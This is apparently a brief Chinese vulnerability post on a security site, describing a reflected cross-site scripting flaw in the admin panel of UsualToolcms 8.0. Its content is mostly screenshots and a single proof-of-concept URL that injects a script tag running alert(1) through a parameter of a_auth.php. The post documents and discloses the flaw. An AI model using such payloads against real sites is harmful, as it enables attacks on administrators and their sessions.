UsualToolcms_8.0_后台反射型XSS

7月15日发布

000

# UsualToolcms 8.0 后台反射型XSS

==============================

一、漏洞简介
————

二、漏洞影响
————

UsualToolcms 8.0

三、复现过程
————

![1.png](/static/qingy/UsualToolcms_8.0_后台反射型XSS/img/rId24.png)

### poc

https://www.0-sec.org/cmsadmin/a_auth.php?do=update&l=%22%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E

![2.png](/static/qingy/UsualToolcms_8.0_后台反射型XSS/img/rId26.png)

参考链接
——–

> https://xz.aliyun.com/t/8100

文章版权归作者所有，未经允许请勿转载。

THE END

喜欢就支持一下吧

请登录后查看评论内容

1独家!超强代码审计工具上线！免费会员等你来嫖！